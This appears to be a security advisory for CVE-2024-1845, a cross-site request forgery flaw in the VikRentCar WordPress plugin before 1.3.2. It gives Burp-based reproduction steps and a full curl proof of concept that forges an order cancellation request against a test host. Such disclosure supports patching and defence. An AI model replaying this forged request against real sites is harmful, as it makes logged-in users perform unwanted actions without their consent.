VikRentCar Car Rental Management System < 1.3.2 – Cross Site Request Forgery | CVE 2024-1845

Description

The plugin does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks

Proof of Concept

Set up the VikeRentCar Plugin on your WordPress site, import sample car rental data, and proceed to rent a car. Once the purchase is successful, navigate to the order page to view your transaction.

1. Click on the Request Cancellation/ Modification button on the view order page.
2. Submit the data and intercept the request on the burp.
3. Generate CSRF POC in the burp and reproduce the request.

CURL COMMAND: 

curl -i -s -k -X $'POST' \
    -H $'Host: tester.local' -H $'Content-Length: 144' -H $'Cache-Control: max-age=0' -H $'Upgrade-Insecure-Requests: 1' -H $'Origin: http://tester.local' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' -H $'Referer: http://tester.local/index.php/search-your-car/?view=order&sid=1591585445&ts=1706063581' -H $'Accept-Encoding: gzip, deflate, br' -H $'Accept-Language: en-US,en;q=0.9' -H $'Connection: close' \
    -b $'stm_lms_courses_watched=997; vrcTFP=ae0ef2a300fd29dbf04bd1aca46de69f; PHPSESSID=58625ae352f01f999d093bd4c17ed8c8; vrcPinData=55834820402' \
    --data-binary $'email=tester%40gmail.com&reason=CSRF&sendrequest=Send+Request&sid=1591585445&idorder=1&option=com_vikrentcar&task=cancelrequest&Itemid=15' \
    $'http://tester.local/index.php/search-your-car/'